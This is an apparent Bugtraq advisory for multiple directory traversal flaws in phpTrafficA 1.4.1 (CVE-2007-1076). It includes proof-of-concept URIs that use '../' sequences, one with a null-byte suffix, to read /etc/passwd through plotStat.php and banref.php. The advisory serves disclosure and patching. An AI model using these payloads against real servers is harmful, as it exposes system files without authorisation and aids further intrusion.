PHPTrafficA Multiple Directory Traversal Vulnerabilities
BID:22655
Info
PHPTrafficA Multiple Directory Traversal Vulnerabilities
| Bugtraq ID: | 22655 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1076 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 21 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | Hamid Ebadi is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
phpTrafficA phpTrafficA 1.4.1 |
| Not Vulnerable: |
phpTrafficA phpTrafficA 1.4.2 |
Discussion
PHPTrafficA Multiple Directory Traversal Vulnerabilities
phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid the attacker in further attacks.
phpTrafficA version 1.4.1 is vulnerable to these issues.
phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid the attacker in further attacks.
phpTrafficA version 1.4.1 is vulnerable to these issues.
Exploit / POC
PHPTrafficA Multiple Directory Traversal Vulnerabilities
Attackers can exploit these issues via a web client.
The following URIs are available:
http://www.example.com/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://www.example.com/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00
Attackers can exploit these issues via a web client.
The following URIs are available:
http://www.example.com/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://www.example.com/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00
Solution / Fix
PHPTrafficA Multiple Directory Traversal Vulnerabilities
Solution:
The vendor released an update to address this issue. Please see the references for more information.
Solution:
The vendor released an update to address this issue. Please see the references for more information.
References
PHPTrafficA Multiple Directory Traversal Vulnerabilities
References:
References:
- phpTrafficA Home Page (phpTrafficA)
- phpTrafficA Release Notes (phpTrafficA)